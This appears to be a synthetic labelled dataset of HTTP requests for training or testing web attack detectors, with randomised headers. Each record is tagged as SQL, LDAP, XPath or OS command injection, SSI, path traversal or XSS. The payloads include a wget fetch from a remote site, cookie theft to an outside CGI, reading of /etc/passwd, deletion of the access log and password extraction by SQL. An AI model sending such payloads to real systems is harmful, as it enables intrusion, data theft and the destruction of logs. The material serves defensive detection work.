User-Agent: donssdt2 (wounNVha; e60te@IA; vkDdXvxP; 3pfo0S)
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x558
Via: 0.7 195.181.183.129:9457, 1.9 175.111.4.64, 5.1 www.eiPrrn.js
Transfer-Encoding: compress
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39708
Start - Id: 43132
class: OsCommanding
GET /sZjFE3e3VKi/oYfq@w/doe4sny/6caaysaLieeeoO/vpoJ14C_oD5/u99V1s.djdPPlprRga/2g7kQZjWvH.PO60CRZ/d6PqIXGVK4/tzVB_XJb/dLlsA/3baJ5F/a.yoWXBodED.asp?E8k4gDFvlogw=idtbylyhr%24&EohAdo0tDhh=ehrnysjlnexec&mav=3397427&oqanAefbMtr=maoteso%3C&solerrtpO=yc4HnfwinntAevalc+1aei&o9FVinX8q=xrats%2BEQxp_re2g2c4&taWeerp=%22+%3B++%2Fusr%2Fbin%2Fwget++++www.stasertellme.com%2Fchor++++%3B&di=l&e2thto6nbtqt=l2&Q.Eo=m%27En%3FDtaawehysr&dtoi3r2=135&medor2t=8236&atp7e=telnetHsm&nUfnidnvjqo=rXZTDnNpz HTTP/1.0
Host: www.asspsa.it
Connection: close
Accept: text/*, video/quicktime
Accept-Charset: cp-950, macintosh, iso-2022-jp;q=0.3, x-mac-chinesesimp
Accept-Encoding: compress, gzip, identity
Accept-Language: *;q=0.5
Cache-Control: max-age=08
Client-ip: 171.241.211.11
Cookie: ub1=5607319528;LeEMncandMcAL6o=1064874366
Cookie2: $Version="900"
Date: Sat, 18 Nov 06 07:22:34 UTC
ETag: "PHN6o3phPfjA6a4@FMWc"
Expect: 100-continue
From: ndud@rzo8frE.cz
If-Modified-Since: Mon, 09 Aug 04 08:16:29 UTC
If-Unmodified-Since: Tue, 31 Aug 04 16:56:28 UTC
If-Match: *
If-None-Match: *
If-Range: "3xBgA5RRYnUytdbLlJ"
Max-Forwards: 37
MIME-Version: 2.7
Pragma: musoieng=h5ntRh
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest realm
Range: 06-14835,74438-28398,3461-5
Referer: /eut2amdm/mirWb/OAcspp/jnts/n2oigsit.jsp
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: Connection
User-Agent: Mozilla/5.5 (X11; U; Unix 4.7; Ss-3a; rv:7.0.9) Gecko/00913623
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.2 www.ieas8Tn.jpg, 6.0 142.98.198.175, urfon/7.8 88.245.106.96
Transfer-Encoding: compress
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43132
Start - Id: 41931
class: SqlInjection
GET /desyfe3Icoen.msf?p3HR2=%27%3B+shutdown--&iwORyD=aen HTTP/1.0
Host: www.n5hcdtRrCi.gov
Connection: eoa6
Accept: application/x-tar;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Fri, 09 Jan 09 05:29:08 CET
ETag: W/"Ci4RWVLC8tPOT6tYZaTt"
Expect: 100-continue
From: m9He0on@mdltezsc.org
If-Modified-Since: Thu, 09 Oct 08 13:01:50 CET
If-Unmodified-Since: Fri, 30 Mar 07 13:32:35 CET
If-Match: "gezxUR8lLgf2Vj4_"
If-None-Match: "86NMV@.8B3FpIztt1"
If-Range: Tue, 14 Sep 04 14:40:46 UTC
Max-Forwards: 3
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: qm5t ecesdu=orTms
Range: 230210-,74601-,-666
Referer: /yL6gTTlt.css
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.9 (X11; U; Open BSD i386 4.8; lv-oa; rv:4.1.7) Gecko/08586232
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/6.0 www.seojecs.html, FTP/8.2 137.134.85.162:9, 0.6 www.oa8b4nt.js:819
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 169.141.62.144
X-Serial-Number: 79709150
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41931
Start - Id: 41726
class: SqlInjection
GET /gAnfeeoSees7leoRa/wWqE/omhnhuc33EJomnuee6/lajSj.CHsfrhs@D/tP@_094MK57o9/ishshnOYs.png?edtkree3irl=ieeCaao8Da11&63YyedropP@Yq=deaey&EnjDfoH=5sXJWE&7aseDlasu=%29&deptnnkeraTa8=167948992&SZ8eprsGhi=st%2B&eddaesangbao=csk4&et8ec=61&u4eoo2Urlu7=argeSzlooi6ealmeSa&olss=%27%3B+++++begin++declare+%40ret++++varchar%288000%29+set++%40ret%3D%27%3A%27+++select+%40ret%3D%40ret%2B%27+++++%27%2Bujstt%2B%27%2F%27%2Bpassword+++++from+pHtiivy+where+++++o1o%3E%40ret++++select++%40ret++as+ret+++++into++++foo+end-- HTTP/1.1
Host: 203.152.5.110:4
Connection: keep-alive
Accept: application/*;q=0.7
Accept-Charset: cp-936;q=0.4, euc-cn;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 130.12.152.206
Cookie: _WoQ=idai;i7Qeufemcsst=gHi1se1znounnlag8;o8Hh9t4jM@=eOpjrt7t5C34t1h
Cookie2: $Version="483"
Date: Sat, 27 Oct 07 05:14:05 UTC
ETag: "YV7eIst2qzOuOaD_"
Expect: 100-continue
From: weLnae2@eCsehh7ca.cz
If-Modified-Since: Fri, 06 Aug 04 01:45:20 GMT
If-Unmodified-Since: Thu, 08 Jan 09 23:57:41 CET
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 073
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: rtgr cIretm=eotIro
Authorization: Basic M2llaUdzM2k6YW5uZWFkdA==
Range: 2985-,9268-37,-4
Referer: http://9mal6.it/ehan/ctl1.avi
TE: gzip,trailers,deflate
Trailer: Via
User-Agent: Mozilla/5.5 (compatible; Rei92lodr; Linux i586; oedck; sycee)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 431x0868
Via: HTTP/3.7 103.155.174.113
Transfer-Encoding: compress
Upgrade: aah/4.0
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 3549851527623289
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41726
Start - Id: 36977
class: LdapInjection
GET /mt1e7p/tqDykk3v4/Y@.Q/s4Qwg/hs/ivrsseoetf/ldd4af/noHf/hdGeO8SRc99IBErU/rmas/hJ1tadsrmhohenh.jsp?F@Wi=55549&e4rehgtAoeyhll=%28ne&sTJngishw=0&rrroBStty0l=7522&tanaW=tbsjbVXAb&jyoone=nrfdT%29%28++%7C++%28ex%3D*%29 HTTP/1.0
Host: 56.17.90.27
Connection: close
Accept: image/png;q=0.4
Accept-Charset: iso-8859-3;q=0.3, gb2312
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=22
Client-ip: 41.167.121.88
Cookie: IuofcTaoq=0415;nEOt=eefee4ud
Cookie2: $Version="595"
Date: Wed, 07 Feb 07 05:44:29 UTC
ETag: W/"YZcyTj4_d3_1LAB"
Expect: 100-continue
From: fipt@jjMrleib1.biz
If-Modified-Since: Sat, 18 Aug 07 14:12:33 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: "pc-oEkXLVe-JP1W"
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 761
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: dakr8 nhu1=fhnr
Authorization: Digest algorithm=lHno4y97
Range: 84-,-422477,1197-5319
Referer: /thre2to/5raetout/rslde6i.js
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 8.9; Ba-a9; rv:2.4.6) Gecko/06130122
UA-CPU: StrongARM
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 654x7541
Via: FTP/0.7 193.235.139.46
Transfer-Encoding: eel4bi; eesNp=0tGeir
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Serial-Number: 4593021783716355
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36977
Start - Id: 49718
class: XPathInjection
GET /pb27PUKhBe/sfNaeB4hsllthsl.htm?Dusntjyrm=79300921&ttradagtbg=865&processing-instruction1-jdKUwWg=lhhal&v4odxqts=tw%2BF%3Dt7hinsertxshiinclude&emrEd=z&ob4tcd4t9uj=ehjnoOhteoaov&gbxbtmppszThtaccesQa=e%3Enr&vyd5W=cayzqoNMOjk&xeewieR166=e2bls%27%5D++%7C+++++P++++%7C+++%2F%2Fuser%5B+++name%2Ftext%28++++%29++%3D%27ao&ielntiass09y=mddenDV9U&tOAlahhnerTs26e=%26aonerdt%3Bs33eft&EoGnetn=ebhq&sbsoAedoe=6852524&da5wCrePr0ia=apsp&fkxPypfLB=sletcs+45ilarCr%5Dbwunion HTTP/1.0
Host: 147.26.41.15
Connection: close
Accept: */*
Accept-Charset: euc-cn;q=0.3, cp-936, utf-8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: r7pcnht=rjgcoe6
Client-ip: 108.36.71.41
Cookie: yut=e_@s.WGsu0t5
Cookie2: $Version="395"
Date: Thu, 22 Jan 04 14:57:37 CET
ETag: "iITkPXqitf-bCHofqIg"
Expect: aeda40o1=roasef;lhishow=zioCeH
From: u5ln@onsTkmM.ch
If-Modified-Since: Wed, 08 Nov 06 06:31:54 CET
If-Unmodified-Since: Thu, 30 Mar 06 20:57:51 GMT
If-Match: "AgAf0R9MEar587QtrgoP"
If-None-Match: "hUUge31XwwYWv51BT7v"
If-Range: Sun, 18 Dec 05 09:49:49 GMT
Max-Forwards: 954
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest algorithm=rasur2N
Range: -5,-8543,85-24971
Referer: /rahh4i/ysad/seat.asmx
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/5.7 (compatible; MSIE 0.9; Win98; e4wx8n)
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: HTTP/6.5 254.107.139.51, FTP/1.2 www.tnae.jpg:20
Transfer-Encoding: gzip
Upgrade: Hr0ss/7.8, oseam/8.9, h6x/4.2
Warning: 552 www.hlm4jou.html:4395 "Roae" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49718
Start - Id: 37511
class: LdapInjection
POST /ee2uC4tt0soorl5oeew/I4VDvOcopyCHI/1_wp-MJfn4s2KMpL/N@/irnuaasoeaHnhd9/ikSegAsbtes7oisfnzel/sbmi/oT43YFXIrpbULiG.tiff? HTTP/1.0
Content-Length: 295
Content-Language: pwn92a,at
Content-Encoding: gzip
Content-Location: http://bssxb6Ea.ch/haac/caGu6rsr/naVclE/repxstp.tiff
Content-MD5: RUlubGFlQzRpYWNhVGhybA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Jul 04 08:47:31 CET
Last-Modified: Wed, 26 Jul 06 15:42:42 CET
Host: www.3stai.net
Connection: hlniasw
Accept: text/plain;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.6, compress;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 243.13.167.199
Cookie: weLjorsgo=650;o2y1t=1131;7ttfNarfditI=3781683;lxsaytth45=h0iufTnoeeocr3vuRs;IeocsgraEff=Ia8eEssNheem0ori;C7dprma=51024
Cookie2: $Version="571"
Date: Thu, 30 Aug 07 22:20:36 GMT
ETag: W/"sa0vFx7xhNJYWVp7t4"
From: t7in1r0e@I35dntt6be.fr
If-Modified-Since: Tue, 15 Aug 06 02:26:44 UTC
If-Unmodified-Since: Sat, 16 Jan 10 09:05:33 GMT
If-Match: "7r2NlhdFIltHSb.cC"
If-None-Match: *
If-Range: Sun, 03 Oct 04 03:29:53 CET
Max-Forwards: 1330
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWhhbmV5ZGJxbm5vbm1lYWlzamVnbWUwdXRoaHBpZm90dHRzb2lyZG4=
Authorization: Basic b2xvbDQ6b2Vnc25I
Referer: http://www.Qewj.fr/eoeatu/dtmiua/isgiiay/eisairc/erwo.jpg
TE: gzip;q=0.3
Trailer: Expect
User-Agent: shfnftueioknomna
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: deflate
Warning: 173 www.uucurht.tiff:45369 "maaas3dCteAprn" 
X-Serial-Number: 4606842395290054569

keOX=atwissa&formHOk@w=zo94W&di58tetj=dhemwohynisccg&L4PRWnbJB2c=lqInhntlw&eee=kthwindow.open&easResp=0370149&xADRjdphtu3r=84787558&hy= idc8breplace&Ote=owI89)(&(objectClass   = et*)&8irylHhT7ubd=br06trtoqo&inhdc=mvtwetn$tghI&ot=541&AnDargEoe=eyan9c7ugawfoyltim&ie=f&oapdi4=1432386

End - Id: 37511
Start - Id: 39135
class: SSI
GET /5kI/aquzi2_1ZTrmwf8/b7UR/OgfsxhatCnmou5Y5.jpg? HTTP/1.1
Host: www.e1itfuiog.st:6
Connection: esooary
Accept: image/png, text/*, application/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: <!--#email fromhost="www.qerrd7.com" tohost="mailbox.q2wdu.com" message="pwhcle oaHAd2t tei mtfra" fromaddress="yReo.com" toaddress="psx.an.com" subject="ad" sender="sOe.com" replyto="twwpe.com" cc="eN" inreplyto="4oew qoe 6zd" id="oheatmail" -->
Accept-Language: e8aets-aifU;q=0.3
Cache-Control: min-fresh=984
Client-ip: 185.24.103.43
Cookie: aHn4e=4lcOiaoI;nh3issg=attd0eu1l=iwinnt;fVsmEesethhmhr=hl9obroOor;eYnsamdeAxULTq=efg50iqlL;yaiatclwho=9
Cookie2: $Version="443"
Date: Sun, 21 Oct 07 09:21:00 GMT
ETag: "WILM38mkEG2SO7@POY"
Expect: hhrmhd=rphdd;asdd=medas
If-Modified-Since: Thu, 03 Jan 08 19:55:25 CET
If-Unmodified-Since: Sun, 26 Nov 06 03:15:57 CET
If-Match: "DhpxkkafM-F@izMmt6"
If-None-Match: "lkb2fErxVVWJ16O"
If-Range: "qatT0qY75NlDv7c1"
Max-Forwards: 146
MIME-Version: 8.3
Pragma: xae=dqiye
Proxy-Authorization: Digest nonce
Authorization: Basic d25Jcm46ZWlkY3ZM
Range: -55067
Referer: /zgxetr/fiL8rDr/fgaaip.pl
TE: trailers,gzip
User-Agent: Mozilla/3.2 (Windows; U; Windows NT 2.3; Mp-6f; rv:5.0.4) Gecko/09658706
UA-Disp: 9875,2381,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Via: 5.1 76.175.66.171, 5.4 230.31.194.44, 4.6 www.eatnt3.jpeg
Transfer-Encoding: deflate
Upgrade: ovle/8.4, aroHm/4.2
Warning: 897 250.38.91.23:5 "auyT" "Wed, 26 Oct 05 13:46:39 UTC"
X-Forwarded-For: 136.245.189.109
X-Serial-Number: 55795183768
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39135
Start - Id: 46111
class: PathTransversal
POST /qE7U/3CesZnoo/i24J0LtE/dBAuf@_NCWQwdqjds2/aof9m5-6/Gx/aCUoU52kwIRSNkFVrCb/oNVLR.dll? HTTP/1.0
Content-Length: 66
Content-Language: ue
Content-Encoding: identity
Content-Location: http://sgendb.net/7tlsdWnH/nrte8/tsciih.pdf
Content-MD5: bmxhd25Tb2xidW1mY2lpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Apr 05 01:53:06 UTC
Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: www.hea9yeoi.org:80
Connection: toot
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: t-ze
Cache-Control: no-cache
Client-ip: 78.173.68.149
Cookie: teefSzzicHdhg=rByipAvyBS_J
Cookie2: $Version="6"
Date: Thu, 22 Sep 05 19:22:17 GMT
ETag: W/"tezP7LWPcMvfNfn.@"
Expect: 100-continue
From: sneTb@ntoa.org
If-Modified-Since: Mon, 12 Sep 05 24:38:37 CET
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "7daUXr4sMREv4k@w11R"
If-None-Match: *
If-Range: "mAybd90AYdtRzL7"
Max-Forwards: 428
MIME-Version: 0.9
Pragma: rP='en'
Proxy-Authorization: NTLM dUF3bnVnc2Vhb3M3SGViSEVpU2NhbmFhdGVtY2dzNG5oczdob2FlZTVqczlhZ2c=
Authorization: Basic aDVlYWVyOnM0YW5kYWVh
Range: -03018,-4474
Referer: http://www.end3.ch/Oxiint.cfm
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/4.9 (compatible; Konqueror/0.1; Mac OS X; wdiho; otl3su)
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: FTP/7.7 www.ezo6eiCe.css, 5.4 www.eeotiee0.jpg, FTP/3.3 87.79.168.17:4
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
Warning: 825 www.rthoh4.html:3 "sTlt2eutin4eMhjcw" "Sun, 01 Feb 04 07:08:46 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

igUuitoe=../../../../../../../../../etc/passwd

End - Id: 46111
Start - Id: 40315
class: SSI
GET /gBWbB2E8Ztt22x/t5V@dvRd9OY3/icmianmse/tsdUvnsorf96S5qojeea/tWSQlgyZWa/usrPaoKPlyeperlb.css?evbstbNoeripu=Eapositionl3&dOGaeletoavncqn=eA3c&s6ewe30tcrdRa5=ug&IfbFun3=rgank&peIswOamxderma=507677931&yqo=diacrwhTc&tolsWo=dEokstpesL1urxta3w&vaIv5varAQvKwe=tpntlocationnhttpsse%26l8d&tlz@QWth=h9K1umPsURZz&fytHnICensalu=GrdstyalhLsZesli&idLfh5oEINI=56015&r6Odt9aeh6c=8597154&cirisPHs=pa&Bhyform1pFlBV7M=%3C%21--%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5CllrsenOr%5C06iwmoc%5CpCotddf.exe++++d%3A%5Cusna%5Cwww.etderaisol.org%5CldlohfpE%5Cdatabase.mdb++%2Fx++exporttofoxpro%22--%3E&Fhmwh=417625 HTTP/1.1
Host: www.athrfomot.fr:5
Connection: keep-alive
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: ho7l-ne, e-heidoe, sona-8oI;q=0.5
Cache-Control: only-if-cached
Client-ip: 189.175.1.221
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Thu, 22 Feb 07 12:36:35 CET
ETag: W/"BreSvbANyEzg2vf5"
Expect: 100-continue
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Wed, 18 Jun 08 09:47:35 CET
If-Unmodified-Since: Mon, 16 Oct 06 19:28:22 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic aW4waXNtaHM6M2F1bnNT
Authorization: NTLM YVJzaXJuYXNlb2lubm50TXNlVG5leWF1ZW9sZWFmY3VF
Range: -2115,0045-233,-51
Referer: http://www.mOi8a.com/doeol73i/foim/ahEdreh.php
TE: gzip;q=0.4,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 6.6; cb-hs; rv:1.3.9) Gecko/80353902
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8587x911
Via: FTP/3.3 www.1aseiet.css:87, 5.9 www.esrasde.tiff, 8.9 www.29i8s.gif
Transfer-Encoding: deflate
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40315
Start - Id: 47330
class: XSS
GET /s1gIbreplace.rHJ/so9utnco/y5A-SQOi@WVZtb/iVtceiymetirtyi/liflijSitnn/d2Ha5w/hwe3r/9ZC/bQixMltN3oOux5kW5cy.sh?LI-TT=elkldn&schildXL.-=%26%3Cscript+++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.anerto.com%2Fcgi-bin%2Fdeieelna.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E HTTP/1.1
Host: www.ort5u0.org:80
Connection: close
Accept: image/gif, audio/x-wav;q=0.4
Accept-Charset: iso-2022-jp
Accept-Encoding: *;q=0.7
Accept-Language: sE-oalEpcn, mehI-d, ll8drxe-tertH, 3hsia-q;q=0.9
Cache-Control: max-age=32115
Client-ip: 68.164.101.129
Cookie: w1gt7itt=oirb;bsenao=c33UX;naylb=tRaudd'aenh
Cookie2: $Version="6"
Date: Mon, 05 Jun 06 17:19:09 UTC
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: "BeiOQ44yJEnzfbbLBtz"
If-None-Match: *
If-Range: "SH6cwk7Ohr@yOQp"
Max-Forwards: 1125
MIME-Version: 3.5
Pragma: 3ekn=ewduIme
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic c3NkQmV0b3Q6YXAxemNlYQ==
Range: -827060,69-,229-399617
Referer: /etmo/tt0krlhk/bNso/mdmb/9thuMgm.tar.gz
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Match
User-Agent: e7piloifc
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6004x311
Via: agt/8.6 217.82.49.45, 0.5 www.ithntm.css, 7.0 34.221.231.196
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 9556709802394
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47330
Start - Id: 36946
class: LdapInjection
PUT /csably/Ko3.30NzLwindow.open/aNNt6qvb/mUDai-7DNuJp@uJh/0usWEVcmHE0Eor/mKxifromyEBY/DvW.gGm/eZ9kUrvZJFxp/jmxAnQ.WliY@b.rKJeE./lanoemhoLm0o/W3FwlP.htm? HTTP/1.1
Content-Length: 153
Content-Language: gtt,eertsh
Content-Encoding: deflate
Content-Location: http://www.itil.com/hop3a/lemAmedu/aNfzoeta/mrhsst9a/4noe.ace
Content-MD5: aGVuMW5hc2lnb2V0U2pyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Apr 05 15:36:49 UTC
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 210.190.225.222:57837
Connection: oe8shnv
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cb-oztco
Cache-Control: min-fresh=42873
Client-ip: 211.137.222.198
Cookie: rG=04089;t3bmr3bteIa56oz=m dfd;jnksrEturzxeo9=s Jnebft
Cookie2: $Version="3"
Date: Thu, 19 Jun 08 20:39:10 GMT
ETag: "oFDKZi1jivzLDTUKzFTh"
Expect: 100-continue
From: ohnue@asue.fr
If-Modified-Since: Sun, 01 Jan 06 15:22:10 CET
If-Unmodified-Since: Thu, 18 Mar 10 22:22:38 GMT
If-Match: "T8--dE@@h@NLpZJMr1W"
If-None-Match: *
If-Range: Tue, 21 Dec 04 16:23:14 UTC
Max-Forwards: 6
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="Srg4"
Range: 060649-
Referer: /fnm4e/eosYn/rCensc2p/6eostTe/mc8to.swf
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 8.8; sa-os; rv:2.6.6) Gecko/62276463
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: 8.2 5.78.241.105:8678, 6.2 www.coranqsi.html, FTP/6.8 26.40.18.134
Transfer-Encoding: compress
Upgrade: 7nr/8.5, fbe/4.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kimrhoqsccetnc=52738&idyd=)    (    |  (displayName=had*)   (name=    had*)( mail=had*    )&qJMZM=oW5&MGkuaccess_logjiV=update(

End - Id: 36946
Start - Id: 43266
class: OsCommanding
GET /nCE8xd3jc/tiwtelxrraKlna5aLm7.png?5uletyesal=03&A5vexecdocumentFh8e2=69962&tletek6yn=n34e&wsnwauad3hhqa=%250arm++-f+%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B&onsesGmeoeo=179416&RjtS=et&Loa0aOAn1ok=r.yOb&vea0aFyanh=5nlistaIpselectexterm+rt&eamtbMzPprltoE=odiveasmpHu+ulIw&RKRt=uzuti HTTP/1.1
Host: 139.150.195.138:01
Connection: tcntt
Accept: text/*, audio/basic;q=0.2, image/png
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.7, compress, compress
Accept-Language: aoin-bXt, sss-Rsroaeon, sasstrj-hat4g4c;q=0.6
Cache-Control: only-if-cached
Client-ip: 116.247.114.110
Cookie: fN2tJ0oupdateYwh-=q;epxhSp7qrw7=adminc9n+t;k8NU21YHmFKwhere=1627
Cookie2: $Version="2"
Date: Sun, 15 Jul 07 21:26:29 CET
ETag: "PEioMFbnQm-_spjg_"
Expect: twur
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Thu, 30 Apr 09 08:04:16 CET
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "sR.uYsOAA23NZNyK77U5"
If-None-Match: "kM.0C@TK9XLxfleixvg"
If-Range: *
Max-Forwards: 273
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: zttEt dnvD=wlrt8e
Range: -640387
Referer: /ttt7u/fdoyhe/hmarEp01.cgi
TE: trailers,trailers,chunked;q=0.1
Trailer: Via
User-Agent: LDilh/2.4.0.7
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: FTP/6.5 www.eceeee.tiff, HTTP/7.8 www.dsset1ul.js:1690, tdt3/9.0 148.199.247.97
Transfer-Encoding: GEtztr; erelOo=e5VsE
Upgrade: lnphe/4.9
Warning: 800 46.120.121.199 "foFemwrttiu2" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 553121190182203403
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43266
Start - Id: 36017
class: PathTransversal
GET /eHqNV/ldZUMSpjdskf/_W67jP3yYHEobjectO/et4/j0O/izyoooevanextmcej/0tOqqDvBFeFsgozFv/aXT5HOugREBZE47o/otiuadaamftuat/esTD1ONhjVUsRCV/ehv_Ruif.tiff?WUduPZ=toAE7vM&nie=5739421&2k4aTG=osM&sgultsCmt=6M%40a5fqoA0Qv&tieeeljndeit=%5Cautoexec.bat&jwltfehahf=rPopen&pw2naInr4ddom=0 HTTP/1.0
Host: 213.209.167.143
Connection: Hat31
Accept: application/rtf, image/jpeg
Accept-Charset: windows-1258;q=0.7
Accept-Encoding: *;q=0.8
